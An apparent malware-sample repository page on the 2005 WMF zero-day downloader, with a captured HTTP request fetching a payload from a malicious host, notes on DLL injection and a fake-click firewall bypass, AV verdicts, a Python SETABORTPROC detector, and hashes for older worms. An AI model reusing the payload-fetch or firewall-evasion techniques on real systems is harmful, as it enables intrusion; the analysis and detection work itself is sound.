Thanks to seville we have more wmf stuff. These go out to a site and download a new file.
Here are some pretty pictures:
So sdbot05b.jpg gets turned into command.pif:

GET /sdbot05b.jpg HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: charmedmadgic.free.fr
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Mon, 02 Jan 2006 05:24:45 GMT
These files make up the downloader from the original WMF exploit posted on Bugtraq. It consists of two parts:
bumXXX.exe md5sum: FE3B1E317846E0F398AF27954DD09C93
tioXXX.dll md5sum: 2AE5ED3EDD6925D6117548CF1E9F3C52
tioXXX.dll is dropped by bumXXX.exe and used for DLL injection into a spawned iexplore.exe, which then downloads the additional components. It also tries to bypass personal firewalls by sending WM_LBUTTONDOWN/WM_LBUTTONUP messages to the firewall's confirmation dialog, i.e. it fakes a left mouse click on the prompt so the outbound connection from iexplore.exe is allowed without the user seeing it.
Also, bumXXX.exe is packed with PE Compact. I just ran it, dumped its memory image, and fixed the IAT manually; the only PE Compact unpacker I found didn't work :/
NEW: I recommend reading this site for more defense information.
This thing is really, really nasty. I completely destroyed a computer trying to analyse it and am almost done rebuilding it :) Luckily I keep my analysis computers segregated, and you should too!
These files were obtained at CastleCops.com and contain all of the related files of the Zero-day IE .wmf exploit. Haven't had time for analysis yet.
Included are a.exe, kl.exe, loaderadv562.exe, ms1.exe, paytime.exe, tool 1 through 5.exe, toolbar.exe, and
NEW: added more related files contributed by seville THANKS!
Scanning -> C:\malware\wmf\vscan\xpl.wmf
[-] File is NON executable..(non MZ)
- Scan Took : 0.0 Seconds
AntiVir Found Trojan/Dldr.WMF.Agent.D
ArcaVir Found nothing
Avast Found Win32:Exdown
AVG Antivirus Found nothing
BitDefender Found Exploit.Win32.WMF-PFV.C
ClamAV Found Exploit.WMF.A
Dr.Web Found Exploit.MS05-053
F-Prot Antivirus Found security risk or a "backdoor" program
Fortinet Found W32/WMF-exploit
Kaspersky Anti-Virus Found Trojan-Downloader.Win32.Agent.acd
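The verdicts above come from running the file past a pile of AV engines, and the names they give are all over the place. As an added example (not a tool from this page or from any of the contributors), here is a small content-based triage check for WMF files. It walks the metafile record chain and flags any META_ESCAPE (0x0626) record whose escape function is SETABORTPROC (9), which is the record the late-December 2005 WMF zero-day (patched as MS06-001) abused to get GDI to call into attacker-supplied bytes. The record and header layouts are the standard Windows metafile ones; the two sample files are constructed inline, and the 0xCC filler in the escape record stands in for whatever an escape record would carry, it is not shellcode from any sample listed here.

```python
import struct

# WMF constants: the standard GDI metafile header key and record numbers.
WMF_PLACEABLE_MAGIC = 0x9AC6CDD7   # Aldus placeable header key
META_EOF = 0x0000
META_ESCAPE = 0x0626
SETABORTPROC = 0x0009              # escape function abused by the 2005 zero-day
META_SETBKCOLOR = 0x0201           # harmless record used in the benign sample


def parse_wmf_records(data):
    """Yield (offset, function, params) for each record in a WMF byte string.

    The parser is deliberately lenient about header fields such as mtSize,
    because exploit files are rarely well-formed; it only needs the record
    chain to be walkable. Sizes in WMF are counted in 16-bit words.
    """
    off = 0
    if len(data) >= 22 and struct.unpack_from("<I", data, 0)[0] == WMF_PLACEABLE_MAGIC:
        off = 22                         # skip the 22-byte placeable header
    if len(data) < off + 18:
        raise ValueError("truncated WMF header")
    mt_type, hdr_words, _ver, _size, _nobj, _maxrec, _nparams = \
        struct.unpack_from("<HHHIHIH", data, off)
    if mt_type not in (1, 2):            # 1 = memory metafile, 2 = disk metafile
        raise ValueError("not a WMF: mtType=%d" % mt_type)
    off += hdr_words * 2
    while off + 6 <= len(data):
        rd_size_words, func = struct.unpack_from("<IH", data, off)
        if rd_size_words < 3:            # rdSize + rdFunction alone are 3 words
            raise ValueError("bad record size at offset %#x" % off)
        end = off + rd_size_words * 2
        if end > len(data):              # record runs past EOF: report what is there, then stop
            yield off, func, data[off + 6:]
            return
        yield off, func, data[off + 6:end]
        if func == META_EOF:
            return
        off = end


def find_setabortproc(data):
    """Return [(offset, declared_byte_count, escape_data)] for every
    META_ESCAPE record whose escape function is SETABORTPROC."""
    hits = []
    for off, func, params in parse_wmf_records(data):
        if func == META_ESCAPE and len(params) >= 4:
            esc_func, nbytes = struct.unpack_from("<HH", params, 0)
            if esc_func == SETABORTPROC:
                hits.append((off, nbytes, params[4:4 + nbytes]))
    return hits


# --- constructed sample files (made up here, not taken from any sample) ----

def build_record(func, params=b""):
    if len(params) % 2:
        raise ValueError("WMF record parameters are word-aligned")
    body = struct.pack("<H", func) + params
    return struct.pack("<I", (4 + len(body)) // 2) + body


def build_wmf(records, placeable=False):
    body = b"".join(records)
    header = struct.pack("<HHHIHIH", 1, 9, 0x0300, (18 + len(body)) // 2,
                         0, max(len(r) // 2 for r in records), 0)
    wmf = header + body
    if placeable:
        # Key, HWmf, BoundingBox (4 words), Inch, Reserved, Checksum
        wmf = struct.pack("<IHHHHHHIH", WMF_PLACEABLE_MAGIC,
                          0, 0, 0, 100, 100, 96, 0, 0) + wmf
    return wmf


BENIGN_WMF = build_wmf([build_record(META_SETBKCOLOR, b"\xff\xff\xff\x00"),
                        build_record(META_EOF)])

# 0xCC filler stands in for the escape payload; it is not shellcode from any sample.
FAKE_PAYLOAD = b"\xcc" * 16
ESCAPE_PARAMS = struct.pack("<HH", SETABORTPROC, len(FAKE_PAYLOAD)) + FAKE_PAYLOAD
SUSPECT_WMF = build_wmf([build_record(META_SETBKCOLOR, b"\xff\xff\xff\x00"),
                         build_record(META_ESCAPE, ESCAPE_PARAMS),
                         build_record(META_EOF)], placeable=True)

if __name__ == "__main__":
    for name, blob in (("benign.wmf", BENIGN_WMF), ("suspect.wmf", SUSPECT_WMF)):
        hits = find_setabortproc(blob)
        if hits:
            print("%s: SETABORTPROC escape at offset %#x, %d bytes of escape data"
                  % (name, hits[0][0], hits[0][1]))
        else:
            print("%s: no SETABORTPROC escape" % name)
```

The check is on content, not on the extension, for the same reason the scan above bothers to say "non MZ": the exploit files were served under whatever name the site liked, and GDI picks the parser from the bytes. Note the parser keeps going on a record that runs past the end of the file instead of rejecting it; a scanner that insists on a well-formed mtSize or rdSize would drop exactly the malformed files that are worth looking at.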
exe sha1sum: 4605a2d0aae8fa5ec0b72973bea928762cc6d002 win_codred_a.exe
exe md5sum: 6f5767ec5a9cc6f7d195dde3c3939120 *win_codred_a.exe
zip md5sum: 55f9524bbbed7f8ae0850ed01562090b *win_codred_a.zip
info: 4039 Jul 16 2001 win_codred_a.exe
Update: I attached the IDB that was provided by the eEye research team. The IDB is fully commented.
exe sha1sum: be4f2b7ca634ce946317acdc54b1423e2f5329ce win_bagle_ai.exe
zip md5sum: 23d344f3b2e5f4dfaa1bdbd56ee39b02 *win_bagle_ai.zip
exe md5sum: 239644e31ce940a25a8ca907feba0d19 *win_bagle_ai.exe
info: 24010 Jul 20 2004
sha1sum: bdc843c65e6984b35dd26c53e84338ff3982da2d win_welchia.exe
md5sum: 24837f736517f367a11dcb8bd8ed6306 *win_welchia.exe
info: 12800 Feb 13 2005 win_welchia.exe
zip md5sum: 3913187407b74597753f324bb9818ba5 *win_welchia.zip